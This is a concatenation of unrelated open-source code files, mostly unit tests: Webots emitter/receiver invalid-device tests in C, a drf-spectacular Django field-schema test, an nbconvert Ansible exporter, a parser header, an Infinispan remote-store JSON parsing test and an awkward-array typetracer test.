// TEST 2: send message on invalid emitter
wb_robot_step(TIME_STEP);
if (receiver) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when send from a NULL emitter", i);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when send from an invalid emitter", i);
} else if (emitter) {
sendLog("Send data from a NULL emitter");
wb_emitter_send(0, msgString0, strlen(msgString0) + 1);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Send data from an invalid emitter");
wb_emitter_send(otherDevice, msgString0, strlen(msgString0) + 1);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
}
// TEST 3: send NULL message on valid emitter
wb_robot_step(TIME_STEP);
if (receiver) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when NULL data is sent", i);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
// TODO
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when data with wrong size is sent", i);
/*buffer = wb_receiver_get_data(receiver);
ts_assert_string_equal(buffer, "He",
"Receiver should receive data \"%s\" not \"%s\" when data with wrong size is sent", "He", buffer);
wb_receiver_next_packet(receiver);
*/
} else if (emitter) {
sendLog("Send NULL data from a valid emitter");
wb_emitter_send(emitter, NULL, strlen(msgString0) + 1);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Send data with wrong size from a avalid emitter");
wb_emitter_send(otherDevice, msgString0, strlen(msgString0) - 3);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
}
// TEST 4: set/get channel on invalid device
if (receiver) {
sendLog("Set channel with NULL receiver");
wb_receiver_set_channel(0, 5);
sendLog("Get channel of a NULL receiver");
i = wb_receiver_get_channel(0);
ts_assert_int_equal(i, -1, "Get channel of a NULL receiver should return %d not %d", -1, i);
sendLog("Set channel with invalid receiver");
wb_receiver_set_channel(otherDevice, 5);
sendLog("Get channel of an invalid receiver");
i = wb_receiver_get_channel(otherDevice);
ts_assert_int_equal(i, -1, "Get channel of an invalid receiver should return %d not %d", -1, i);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Set channel of a disabled receiver");
wb_receiver_set_channel(receiver, 7);
i = wb_receiver_get_channel(receiver);
ts_assert_int_equal(i, 7, "Setting the channel of a disabled receiver should possible, channel should be %d not %d", 7, i);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Set channel of a valid receiver to a negative value");
wb_receiver_set_channel(receiver, -5);
i = wb_receiver_get_channel(receiver);
ts_assert_int_equal(
i, 7, "Setting the channel of a receiver to a negative value should not be possible, channel should be %d not %d", 7, i);
} else if (emitter) {
sendLog("Set channel with NULL emitter");
wb_emitter_set_channel(0, 5);
sendLog("Get channel of a NULL emitter");
i = wb_emitter_get_channel(0);
ts_assert_int_equal(i, -1, "Get channel of a NULL emitter should return %d not %d", -1, i);
sendLog("Set channel with invalid emitter");
wb_emitter_set_channel(otherDevice, 5);
sendLog("Get channel of an invalid emitter");
i = wb_emitter_get_channel(otherDevice);
ts_assert_int_equal(i, -1, "Get channel of an invalid emitter should return %d not %d", -1, i);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Set channel of a valid emitter to a negative value");
wb_emitter_set_channel(emitter, -5);
i = wb_emitter_get_channel(emitter);
ts_assert_int_equal(
i, 2, "Setting the channel of an emitter to a negative value should not be possible, channel should be should %d not %d",
2, i);
}
wb_robot_step(TIME_STEP);
if (receiver) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
} else if (emitter) {
// TEST 5: set/get range on invalid emitter
sendLog("Set range with NULL emitter");
wb_emitter_set_range(0, 0.33);
sendLog("Get range of a NULL emitter");
d = wb_emitter_get_range(0);
ts_assert_double_equal(d, NAN, "Get range of a NULL emitter should return NAN not %f", d);
wb_robot_step(TIME_STEP);
sendLog("Set range with invalid emitter");
wb_emitter_set_range(otherDevice, 0.33);
sendLog("Get range of an invalid emitter");
d = wb_emitter_get_range(otherDevice);
ts_assert_double_equal(d, NAN, "Get range of an invalid emitter should return NAN not %f", d);
sendLog("Set range of a valid emitter to a negative value");
wb_emitter_set_range(emitter, -0.33);
d = wb_emitter_get_range(emitter);
ts_assert_double_equal(
d, 0.8, "Setting the range of an emitter to a negative value should not be possible, range should be should %d not %f",
0.8, d);
// TEST 6: get buffer size on invalid emitter
wb_robot_step(TIME_STEP);
sendLog("Get buffer size of a NULL emitter");
i = wb_emitter_get_buffer_size(0);
ts_assert_int_equal(i, -1, "Get buffer size of a NULL emitter should return -1 not %d", i);
sendLog("Get buffer size of an invalid emitter");
i = wb_emitter_get_buffer_size(otherDevice);
ts_assert_int_equal(i, -1, "Get buffer size of an invalid emitter should return -1 not %d", i);
ts_send_success();
return EXIT_SUCCESS;
}
// ONLY receiver
  // TEST 6: get queue_length on invalid receiver
wb_robot_step(TIME_STEP);
sendLog("Get queue length of a NULL receiver");
queueLength = wb_receiver_get_queue_length(0);
ts_assert_int_equal(queueLength, -1, "Get queue length of a NULL emitter should return -1 not %d", queueLength);
sendLog("Get queue length of an invalid receiver");
queueLength = wb_receiver_get_queue_length(otherDevice);
ts_assert_int_equal(queueLength, -1, "Get queue length of an invalid emitter should return -1 not %d", queueLength);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Get queue length of a disabled receiver");
queueLength = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(queueLength, 0, "Get queue length of a disabled emitter should return 0 not %d", queueLength);
// TEST 7: call next packet on invalid receiver
wb_robot_step(TIME_STEP);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Call next packet of a NULL receiver");
wb_receiver_next_packet(0);
sendLog("Call next packet of an invalid receiver");
wb_receiver_next_packet(otherDevice);
sendLog("Call next packet of a disabled receiver with empty reception list");
wb_receiver_next_packet(receiver);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Call next packet of an enabled receiver with empty reception list");
wb_receiver_next_packet(receiver);
  // TEST 8: get data and data size on invalid receiver
wb_robot_step(TIME_STEP);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Get data of a NULL receiver");
buffer = wb_receiver_get_data(0);
ts_assert_pointer_null((void *)buffer, "Get data of a NULL receiver should return NULL not \"%s\"", buffer);
sendLog("Get data size of a NULL receiver");
i = wb_receiver_get_data_size(0);
ts_assert_int_equal(i, -1, "Get data size of a NULL receiver should return -1 not %d", i);
sendLog("Get data of an invalid receiver");
buffer = wb_receiver_get_data(otherDevice);
ts_assert_pointer_null((void *)buffer, "Get data of an invalid receiver should return NULL not \"%s\"", buffer);
sendLog("Get data size of an invalid receiver");
i = wb_receiver_get_data_size(otherDevice);
ts_assert_int_equal(i, -1, "Get data size of an invalid receiver should return -1 not %d", i);
sendLog("Get data of a disabled receiver with empty reception list");
buffer = wb_receiver_get_data(receiver);
ts_assert_pointer_null((void *)buffer, "Get data of an invalid receiver should return NULL not \"%s\"", buffer);
sendLog("Get data size of a disabled receiver with empty reception list");
i = wb_receiver_get_data_size(receiver);
ts_assert_int_equal(i, -1, "Get data size of a disabled receiver with empty reception list should return -1 not %d", i);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Get data of a valid receiver with empty reception list");
buffer = wb_receiver_get_data(receiver);
ts_assert_pointer_null((void *)buffer, "Get data of a valid receiver with empty reception list should return NULL not \"%s\"",
buffer);
sendLog("Get data size of a valid receiver with empty reception list");
i = wb_receiver_get_data_size(receiver);
ts_assert_int_equal(i, -1, "Get data size of a valid receiver with empty reception list should return -1 not %d", i);
// TEST 9: get signal strength on invalid receiver
wb_robot_step(TIME_STEP);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Get signal strength of a NULL receiver");
d = wb_receiver_get_signal_strength(0);
ts_assert_double_equal(d, NAN, "Get signal strength of a NULL receiver should return NAN not %f", d);
sendLog("Get signal strength of an invalid receiver");
d = wb_receiver_get_signal_strength(otherDevice);
ts_assert_double_equal(d, NAN, "Get signal strength of an invalid receiver should return NAN not %f", d);
sendLog("Get signal strength of a disabled receiver with empty reception list");
d = wb_receiver_get_signal_strength(receiver);
ts_assert_double_equal(d, NAN, "Get signal strength of an invalid receiver should return NAN not %f", d);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Get signal strength of a valid receiver with empty reception list");
d = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(d, 0, "Get signal strength of a valid receiver with empty reception list should return 0 not %f", d);
// TEST 10: get emitter direction on invalid receiver
wb_robot_step(TIME_STEP);
sendLog("Get emitter direction of a NULL receiver");
doubleArray = wb_receiver_get_emitter_direction(0);
ts_assert_pointer_null((void *)doubleArray, "Get emitter direction of a NULL emitter should return NULL");
sendLog("Get emitter direction of an invalid receiver");
doubleArray = wb_receiver_get_emitter_direction(otherDevice);
ts_assert_pointer_null((void *)doubleArray, "Get emitter direction of an invalid emitter should return NULL");
sendLog("Get emitter direction of a disabled receiver with empty reception list");
doubleArray = wb_receiver_get_emitter_direction(receiver);
ts_assert_pointer_null((void *)doubleArray, "Get emitter direction of an invalid receiver should return NULL");
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Get emitter direction of a valid receiver with empty reception list");
doubleArray = wb_receiver_get_emitter_direction(receiver);
ts_assert_pointer_null((void *)doubleArray,
"Get emitter direction of a valid receiver with empty reception list should return NULL");
ts_send_success();
return EXIT_SUCCESS;
}
| 5,444 |
1,025 | import functools
import json
import sys
import tempfile
import uuid
from datetime import timedelta
from decimal import Decimal
from typing import Optional
import pytest
from django import __version__ as DJANGO_VERSION
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.urls import reverse
from django.utils.functional import cached_property
from rest_framework import serializers, viewsets
from rest_framework.routers import SimpleRouter
from rest_framework.test import APIClient
from drf_spectacular.generators import SchemaGenerator
from tests import assert_equal, assert_schema, build_absolute_file_path
# functools.cached_property only exists from Python 3.8 on; fall back to
# Django's cached_property so both "py cached" test variants work everywhere.
if sys.version_info >= (3, 8):
    functools_cached_property = functools.cached_property
else:
    # We re-use Django's cached_property when it's not available to
    # keep tests unified across Python versions.
    functools_cached_property = cached_property

# File storage rooted in the system temp dir so FileField/ImageField test
# uploads don't land inside the repository.
fs = FileSystemStorage(location=tempfile.gettempdir())
class Aux(models.Model):
    """Auxiliary model targeted by the FK/M2M/O2O relations on AllFields."""
    # UUID primary key so related fields exercise non-integer PK serialization.
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    # Self-referential FK; nullable so chains terminate (needed by the 3-step
    # source traversal in AllFieldsSerializer).
    field_foreign = models.ForeignKey('Aux', null=True, on_delete=models.CASCADE)
class AuxSerializer(serializers.ModelSerializer):
    """ description for aux object """
    # NOTE: the docstring above is test data -- drf-spectacular emits it as the
    # component description checked against tests/test_fields.yml; don't edit it.

    class Meta:
        fields = '__all__'
        model = Aux
class SubObject:
    """Plain (non-model) wrapper used to test serializer ``source`` traversal
    through arbitrary Python objects and their properties."""

    def __init__(self, instance):
        # Wrapped AllFields instance; handed back via ``model_instance``.
        self._wrapped = instance

    @property
    def calculated(self) -> int:
        """Integer derived from the wrapped model's ``field_int``."""
        return self._wrapped.field_int

    @property
    def nested(self) -> 'SubObject':
        """Self-reference so sources like ``sub_object.nested.calculated`` resolve."""
        return self

    @property
    def model_instance(self) -> 'AllFields':
        """The wrapped model instance, for traversal back into model fields."""
        return self._wrapped

    @property
    def optional_int(self) -> Optional[int]:
        """Constant 1; typed Optional to exercise nullable introspection."""
        return 1
class AllFields(models.Model):
    """Kitchen-sink model covering nearly every Django field type plus
    properties, cached properties and model functions, used to exercise
    drf-spectacular's type introspection."""
    # basics
    field_int = models.IntegerField()
    field_float = models.FloatField()
    field_bool = models.BooleanField()
    field_char = models.CharField(max_length=100)
    field_text = models.TextField(verbose_name='a text field')
    # special
    field_slug = models.SlugField()
    field_email = models.EmailField()
    field_uuid = models.UUIDField()
    field_url = models.URLField()
    field_ip_generic = models.GenericIPAddressField(protocol='ipv6')
    field_decimal = models.DecimalField(max_digits=6, decimal_places=3)
    field_file = models.FileField(storage=fs)
    field_img = models.ImageField(storage=fs)
    field_date = models.DateField()
    field_datetime = models.DateTimeField()
    field_bigint = models.BigIntegerField()
    field_smallint = models.SmallIntegerField()
    field_posint = models.PositiveIntegerField()
    field_possmallint = models.PositiveSmallIntegerField()
    # NOTE(review): this branch uses '>' while the JSON branch below uses '>=',
    # so on exactly Django 3.1 the deprecated NullBooleanField is still used --
    # confirm the asymmetry is intentional.
    if DJANGO_VERSION > '3.1':
        field_nullbool = models.BooleanField(null=True)
    else:
        field_nullbool = models.NullBooleanField() # type: ignore
    field_time = models.TimeField()
    field_duration = models.DurationField()
    field_binary = models.BinaryField()
    # relations
    field_foreign = models.ForeignKey(
        Aux, on_delete=models.CASCADE, help_text='main aux object', related_name='ff'
    )
    field_m2m = models.ManyToManyField(
        Aux, help_text='set of related aux objects', related_name='fm'
    )
    field_o2o = models.OneToOneField(
        Aux, on_delete=models.CASCADE, help_text='bound aux object', related_name='fo'
    )
    # overrides
    field_regex = models.CharField(max_length=50)
    field_bool_override = models.BooleanField()
    # JSONField only exists as a model field from Django 3.1 on; older versions
    # emulate it with a property returning a fixed dict.
    if DJANGO_VERSION >= '3.1':
        field_json = models.JSONField()
    else:
        @property
        def field_json(self):
            return {'A': 1, 'B': 2}
    @property
    def field_model_property_float(self) -> float:
        return 1.337
    @cached_property
    def field_model_cached_property_float(self) -> float:
        return 1.337
    @functools_cached_property
    def field_model_py_cached_property_float(self) -> float:
        return 1.337
    @property
    def field_list(self):
        return [1.1, 2.2, 3.3]
    @property
    def field_list_object(self):
        # Queryset of related Aux objects; serialized via field_list_serializer.
        return self.field_m2m.all()
    def model_function_basic(self) -> bool:
        return True
    def model_function_model(self) -> Aux:
        return self.field_foreign
    # Plain / Django-cached / functools-cached variants of a non-model object,
    # to test serializer source traversal through each property flavor.
    @property
    def sub_object(self) -> SubObject:
        return SubObject(self)
    @cached_property
    def sub_object_cached(self) -> SubObject:
        return SubObject(self)
    @functools_cached_property
    def sub_object_py_cached(self) -> SubObject:
        return SubObject(self)
    @property
    def optional_sub_object(self) -> Optional[SubObject]:
        return SubObject(self)
class AllFieldsSerializer(serializers.ModelSerializer):
    """Serializer mirroring AllFields plus explicitly declared fields for every
    non-model source variant drf-spectacular must introspect."""
    # Decimal emitted as a JSON number instead of DRF's default string form.
    field_decimal_uncoerced = serializers.DecimalField(
        source='field_decimal',
        max_digits=6,
        decimal_places=3,
        coerce_to_string=False
    )
    field_method_float = serializers.SerializerMethodField()
    def get_field_method_float(self, obj) -> float:
        return 1.3456
    field_method_object = serializers.SerializerMethodField()
    def get_field_method_object(self, obj) -> dict:
        return {'key': 'value'}
    # NOTE(review): 'a-zA-z' (lowercase final z) also matches '[\]^_`' -- kept
    # as-is since the stored schema fixture contains this exact pattern.
    field_regex = serializers.RegexField(r'^[a-zA-z0-9]{10}\-[a-z]', label='A regex field')
    field_hidden = serializers.HiddenField(default='')
    # composite fields
    field_list = serializers.ListField(
        child=serializers.FloatField(), min_length=3, max_length=100,
    )
    field_list_serializer = serializers.ListField(
        child=AuxSerializer(),
        source='field_list_object',
    )
    # extra related fields
    field_related_slug = serializers.SlugRelatedField(
        read_only=True, source='field_foreign', slug_field='id'
    ) # type: ignore
    field_related_string = serializers.StringRelatedField(
        source='field_foreign'
    ) # type: ignore
    field_related_hyperlink = serializers.HyperlinkedRelatedField(
        read_only=True, source='field_foreign', view_name='aux-detail'
    ) # type: ignore
    field_identity_hyperlink = serializers.HyperlinkedIdentityField(
        read_only=True, view_name='allfields-detail'
    )
    # read only - model traversal
    field_read_only_nav_uuid = serializers.ReadOnlyField(source='field_foreign.id')
    field_read_only_nav_uuid_3steps = serializers.ReadOnlyField(
        source='field_foreign.field_foreign.field_foreign.id',
        allow_null=True,  # force field output even if traversal fails
    )
    field_read_only_model_function_basic = serializers.ReadOnlyField(source='model_function_basic')
    field_read_only_model_function_model = serializers.ReadOnlyField(source='model_function_model.id')
    # override default writable bool field with readonly
    field_bool_override = serializers.ReadOnlyField()
    field_model_property_float = serializers.ReadOnlyField()
    field_model_cached_property_float = serializers.ReadOnlyField()
    field_model_py_cached_property_float = serializers.ReadOnlyField()
    field_dict_int = serializers.DictField(
        child=serializers.IntegerField(),
        source='field_json',
    )
    # there is a JSON model field for django>=3.1 that would be placed automatically. for <=3.1 we
    # need to set the field explicitly. defined here for both cases to have consistent ordering.
    field_json = serializers.JSONField()
    # traversal of non-model types of complex object
    field_sub_object_calculated = serializers.ReadOnlyField(source='sub_object.calculated')
    field_sub_object_nested_calculated = serializers.ReadOnlyField(source='sub_object.nested.calculated')
    field_sub_object_model_int = serializers.ReadOnlyField(source='sub_object.model_instance.field_int')
    field_sub_object_cached_calculated = serializers.ReadOnlyField(source='sub_object_cached.calculated')
    field_sub_object_cached_nested_calculated = serializers.ReadOnlyField(source='sub_object_cached.nested.calculated')
    field_sub_object_cached_model_int = serializers.ReadOnlyField(source='sub_object_cached.model_instance.field_int')
    field_sub_object_py_cached_calculated = serializers.ReadOnlyField(source='sub_object_py_cached.calculated')
    field_sub_object_py_cached_nested_calculated = serializers.ReadOnlyField(
        source='sub_object_py_cached.nested.calculated',
    )
    field_sub_object_py_cached_model_int = serializers.ReadOnlyField(
        source='sub_object_py_cached.model_instance.field_int',
    )
    # typing.Optional
    field_optional_sub_object_calculated = serializers.ReadOnlyField(
        source='optional_sub_object.calculated',
        allow_null=True,
    )
    field_sub_object_optional_int = serializers.ReadOnlyField(
        source='sub_object.optional_int',
        allow_null=True,
    )
    class Meta:
        fields = '__all__'
        model = AllFields
class AllFieldsModelViewset(viewsets.ReadOnlyModelViewSet):
    """Read-only API over the kitchen-sink model."""
    serializer_class = AllFieldsSerializer
    queryset = AllFields.objects.all()
    def retrieve(self, request, *args, **kwargs):
        # Pass-through override; presumably here so schema introspection sees
        # an explicitly declared method -- TODO confirm before removing.
        return super().retrieve(request, *args, **kwargs)
class AuxModelViewset(viewsets.ReadOnlyModelViewSet):
    """Read-only API over the auxiliary model; target of the hyperlinked fields."""
    serializer_class = AuxSerializer
    queryset = Aux.objects.all()
# The registered route names also back the hyperlinked serializer fields
# above ('allfields-detail', 'aux-detail').
router = SimpleRouter()
router.register('allfields', AllFieldsModelViewset)
router.register('aux', AuxModelViewset)
urlpatterns = router.urls
@pytest.mark.urls(__name__)
def test_fields(no_warnings):
    """Generated schema for the kitchen-sink serializer matches the stored YAML."""
    generator = SchemaGenerator()
    schema = generator.get_schema(request=None, public=True)
    assert_schema(schema, 'tests/test_fields.yml')
@pytest.mark.urls(__name__)
@pytest.mark.django_db
def test_model_setup_is_valid():
    """Sanity check that the model/serializer pair is usable at runtime and the
    API response matches the stored JSON fixture."""
    aux = Aux(id='0ac6930d-87f4-40e8-8242-10a3ed31a335')
    aux.save()
    m = AllFields(
        # basics
        field_int=1,
        field_float=1.25,
        field_bool=True,
        field_char='char',
        field_text='text',
        # special
        field_slug='all_fields',
        field_email='<EMAIL>',
        field_uuid='00000000-00000000-00000000-00000000',
        field_url='https://github.com/tfranzel/drf-spectacular',
        field_ip_generic='2001:db8::8a2e:370:7334',
        field_decimal=Decimal('666.333'),
        field_file=None,
        field_img=None, # TODO fill with data below
        field_date='2021-09-09',
        field_datetime='2021-09-09T10:15:26.049862',
        field_bigint=11111111111111,
        field_smallint=111111,
        field_posint=123,
        field_possmallint=1,
        field_nullbool=None,
        field_time='00:05:23.283',
        field_duration=timedelta(seconds=10),
        field_binary=b'\xce\x9c\xce\xb9\xce\xb1',
        # relations
        field_foreign=aux,
        field_o2o=aux,
        # overrides
        field_regex='12345asdfg-a',
        field_bool_override=True,
    )
    if DJANGO_VERSION >= '3.1':
        m.field_json = {'A': 1, 'B': 2}
    # save=True persists the model instance along with the uploaded file.
    m.field_file.save('hello.txt', ContentFile("hello world"), save=True)
    m.save()
    m.field_m2m.add(aux)
    response = APIClient().get(reverse('allfields-detail', args=(m.pk,)))
    assert response.status_code == 200
    with open(build_absolute_file_path('tests/test_fields_response.json')) as fh:
        expected = json.load(fh)
    # FileField URL layout differs between Django versions; patch the fixture.
    if DJANGO_VERSION < '3':
        expected['field_file'] = f'http://testserver/allfields/1/{m.field_file.name}'
    else:
        expected['field_file'] = f'http://testserver/{m.field_file.name}'
    assert_equal(json.loads(response.content), expected)
| 4,478 |
476 | """Ansible tasks Exporter class"""
import os
from traitlets import default
from nbconvert.exporters.templateexporter import TemplateExporter
class AnsibleTasksExporter(TemplateExporter):
    """
    Exports an Ansible tasks file.
    """
    # Label shown in Jupyter's export/"Download as" menu.
    export_from_notebook = "Ansible Tasks"
    # NOTE(review): 'text/yml' is not a registered MIME type; 'text/yaml' or
    # 'application/x-yaml' would be conventional -- confirm nothing depends on
    # this exact value before changing it.
    output_mimetype = 'text/yml'
    @default('file_extension')
    def _file_extension_default(self):
        # Extension used for the exported file.
        return '.yaml'
    @default('template_file')
    def _template_file_default(self):
        # Jinja template implementing the notebook -> tasks conversion.
        return 'ansible_tasks.tpl'
    @property
    def template_path(self):
        # Keep nbconvert's default search path and append this package's
        # ../templates directory so ansible_tasks.tpl can be found.
        return super(AnsibleTasksExporter, self).template_path + [os.path.join(os.path.dirname(os.path.dirname(__file__)), "templates")]
| 268 |
488 | <filename>projects/SATIrE/src/pig/yystype.h
// Copyright 2005,2006,2007 <NAME>, <NAME>
// $Id: yystype.h,v 1.2 2007-03-08 15:36:49 markus Exp $
#ifndef H_YYSTYPE
#define H_YYSTYPE
#include <vector>
#include "spec.h"
#include "Rule.h"
// Semantic value type shared between the PIG lexer and parser. Member
// descriptions are inferred from names and the types in spec.h/Rule.h --
// confirm against the grammar file before relying on them.
union yystype
{
    struct isn idstrnum;                // single id/string/number token value
    std::vector<struct isn> *idstrlist; // list of such values (heap-allocated)
    const char *code;                   // verbatim code fragment from the spec
    std::vector<Rule *> *rules;         // accumulated PIG rules
    bool extern_c;                      // presumably: emit with C linkage
    bool per_constructor;               // presumably: applies per constructor
    bool islist;                        // presumably: list-typed entity
    bool macro;                         // presumably: emit as macro, not function
};
typedef union yystype YYSTYPE;
// Parser's semantic value variable ('pig' prefix, bison convention).
extern YYSTYPE piglval;
// Prevent the bison-generated parser from declaring its own default YYSTYPE.
#define YYSTYPE_IS_DECLARED
#endif
| 254 |
713 | package org.infinispan.persistence.remote.configuration;
import static org.testng.AssertJUnit.assertEquals;
import static org.testng.AssertJUnit.assertFalse;
import static org.testng.AssertJUnit.assertNotNull;
import static org.testng.AssertJUnit.assertTrue;
import java.io.IOException;
import java.util.List;
import org.infinispan.client.hotrod.ProtocolVersion;
import org.infinispan.commons.dataconversion.internal.Json;
import org.infinispan.commons.util.TypedProperties;
import org.infinispan.configuration.cache.ConfigurationBuilder;
import org.infinispan.persistence.remote.upgrade.SerializationUtils;
import org.testng.annotations.Test;
/**
* Test parsing of a JSON document containing only a remote-store config
*
* @since 13.0
*/
@Test(groups = "unit", testName = "persistence.remote.configuration.JsonRemoteStoreOnlyParsingTest")
public class JsonRemoteStoreOnlyParsingTest {

   /**
    * Parses a standalone remote-store JSON document and verifies every
    * configuration section (servers, pool, executor, security) round-trips
    * into the typed configuration objects.
    */
   @Test
   public void testJsonParsing() throws IOException {
      String json = "{\n" +
            "  \"remote-store\":{\n" +
            "    \"cache\":\"ccc\",\n" +
            "    \"shared\":true,\n" +
            "    \"read-only\":false,\n" +
            "    \"hotrod-wrapping\":false,\n" +
            "    \"raw-values\":false,\n" +
            "    \"socket-timeout\":60000,\n" +
            "    \"protocol-version\":\"2.8\",\n" +
            "    \"remote-server\":[\n" +
            "      {\n" +
            "        \"host\":\"127.0.0.2\",\n" +
            "        \"port\":12222\n" +
            "      }\n" +
            "    ],\n" +
            "    \"connection-pool\":{\n" +
            "      \"max-active\":110,\n" +
            "      \"exhausted-action\":\"CREATE_NEW\"\n" +
            "    },\n" +
            "    \"async-executor\":{\n" +
            "      \"properties\":{\n" +
            "        \"name\":4\n" +
            "      }\n" +
            "    },\n" +
            "    \"properties\":{\n" +
            "      \"key\":\"value\"\n" +
            "    },\n" +
            "    \"security\":{\n" +
            "      \"authentication\":{\n" +
            "        \"server-name\":\"servername\",\n" +
            "        \"digest\":{\n" +
            "          \"username\":\"username\",\n" +
            "          \"password\":\"password\",\n" +
            "          \"realm\":\"realm\"\n" +
            "        }\n" +
            "      },\n" +
            "      \"encryption\":{\n" +
            "        \"protocol\":\"TLSv1.2\",\n" +
            "        \"sni-hostname\":\"snihostname\",\n" +
            "        \"keystore\":{\n" +
            "          \"filename\":\"${project.build.testOutputDirectory}/keystore_client.jks\",\n" +
            "          \"password\":\"<PASSWORD>\",\n" +
            "          \"certificate-password\":\"<PASSWORD>\",\n" +
            "          \"key-alias\":\"hotrod\",\n" +
            "          \"type\":\"JKS\"\n" +
            "        },\n" +
            "        \"truststore\":{\n" +
            "          \"filename\":\"${project.build.testOutputDirectory}/ca.jks\",\n" +
            "          \"type\":\"pem\"\n" +
            "        }\n" +
            "      }\n" +
            "    }\n" +
            "  }\n" +
            "}";
      RemoteStoreConfiguration store = SerializationUtils.fromJson(json);
      // Top-level store attributes.
      assertEquals("ccc", store.remoteCacheName());
      assertTrue(store.shared());
      assertFalse(store.ignoreModifications());
      assertFalse(store.hotRodWrapping());
      assertFalse(store.rawValues());
      assertEquals(60000, store.socketTimeout());
      assertEquals(ProtocolVersion.PROTOCOL_VERSION_28, store.protocol());
      // Server list.
      List<RemoteServerConfiguration> servers = store.servers();
      RemoteServerConfiguration firstServer = servers.iterator().next();
      assertEquals(1, servers.size());
      assertEquals("127.0.0.2", firstServer.host());
      assertEquals(12222, firstServer.port());
      // Async executor properties.
      TypedProperties asyncExecutorProps = store.asyncExecutorFactory().properties();
      assertEquals(1, asyncExecutorProps.size());
      assertEquals(4, asyncExecutorProps.getLongProperty("name", 0L));
      // Connection pool.
      ConnectionPoolConfiguration poolConfiguration = store.connectionPool();
      assertEquals(ExhaustedAction.CREATE_NEW, poolConfiguration.exhaustedAction());
      assertEquals(110, poolConfiguration.maxActive());
      // Security: the "digest" element implies the DIGEST-MD5 SASL mechanism.
      AuthenticationConfiguration authentication = store.security().authentication();
      assertEquals("servername", authentication.serverName());
      MechanismConfiguration mechanismConfiguration = authentication.mechanismConfiguration();
      assertEquals(mechanismConfiguration.saslMechanism(), "DIGEST-MD5");
      SslConfiguration ssl = store.security().ssl();
      assertEquals("snihostname", ssl.sniHostName());
      assertEquals("secret", new String(ssl.keyStorePassword()));
   }

   /**
    * Serializes a programmatically built remote-store configuration and
    * verifies the JSON output has a single top-level "remote-store" element.
    */
   @Test
   public void testJsonSerializing() {
      ConfigurationBuilder builder = new ConfigurationBuilder();
      builder.persistence().addStore(RemoteStoreConfigurationBuilder.class)
            .remoteCacheName("remote").addServer().host("127.0.0.2").port(1111)
            .remoteSecurity()
            .authentication().enable().saslMechanism("DIGEST-MD5")
            .username("user")
            .password("<PASSWORD>")
            .realm("default");
      RemoteStoreConfiguration remoteStoreConfiguration = (RemoteStoreConfiguration) builder.build().persistence().stores().iterator().next();
      Json serialized = Json.read(SerializationUtils.toJson(remoteStoreConfiguration));
      assertEquals(1, serialized.asJsonMap().size());
      assertNotNull(serialized.at("remote-store"));
   }
}
| 2,967 |
519 | <reponame>scikit-hep/awkward-1.0
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import pytest # noqa: F401
import numpy as np # noqa: F401
import awkward as ak # noqa: F401
from awkward._v2._typetracer import Interval
# Singleton backend used to build "typetracer" (shape-only, data-free) arrays.
typetracer = ak._v2._typetracer.TypeTracer.instance()
def test_getitem_at():
    """Indexing a typetracer-backed NumpyArray tracks shapes without data."""
    eager = ak._v2.contents.NumpyArray(np.arange(2 * 3 * 5).reshape(2, 3, 5) * 0.1)
    traced = ak._v2.contents.NumpyArray(eager.to(typetracer))

    # Shapes: the traced outermost dimension is an exact Interval, inner
    # dimensions stay plain integers, and each __getitem__ peels one off.
    assert eager.shape == (2, 3, 5)
    assert traced.shape == (Interval.exact(2), 3, 5)
    assert traced[0].shape == (Interval.exact(3), 5)
    assert traced[0][0].shape == (Interval.exact(5),)
    assert traced[0][0][0] == 0

    # Forms and types must agree between the concrete and traced arrays.
    assert traced.form == eager.form
    assert traced.form.type == eager.form.type
    assert traced[0].form == eager[0].form
    assert traced[0].form.type == eager[0].form.type
| 383 |
956 | /* SPDX-License-Identifier: BSD-3-Clause
* Copyright(c) 2017 Cavium, Inc
*/
#ifndef _RTE_PAUSE_ARM_H_
#define _RTE_PAUSE_ARM_H_
#ifdef __cplusplus
extern "C" {
#endif
/* Dispatch to the architecture-specific implementation: 64-bit ARM builds
 * include rte_pause_64.h, 32-bit ARM builds include rte_pause_32.h. */
#ifdef RTE_ARCH_64
#include <rte_pause_64.h>
#else
#include <rte_pause_32.h>
#endif
#ifdef __cplusplus
}
#endif
#endif /* _RTE_PAUSE_ARM_H_ */
| 154 |
5,156 | from util import *
# Set a breakpoint on the inferior's `breakpoint` function; the first expect
# matches gdb's "Breakpoint 1 at ..." confirmation.
